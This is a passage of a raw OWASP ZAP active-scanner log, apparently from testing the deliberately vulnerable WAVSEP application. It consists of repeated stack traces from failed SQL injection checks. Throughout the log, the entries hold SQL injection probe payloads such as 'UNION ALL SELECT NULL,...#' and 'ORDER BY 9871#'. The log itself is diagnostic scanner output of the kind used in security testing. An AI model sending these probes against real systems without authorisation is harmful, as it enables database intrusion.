org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688443 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688444 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688445 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688446 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688447 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688448 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688450 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688452 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688454 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688455 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688456 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688457 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 9871#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') ORDER BY 9871# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688458 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at 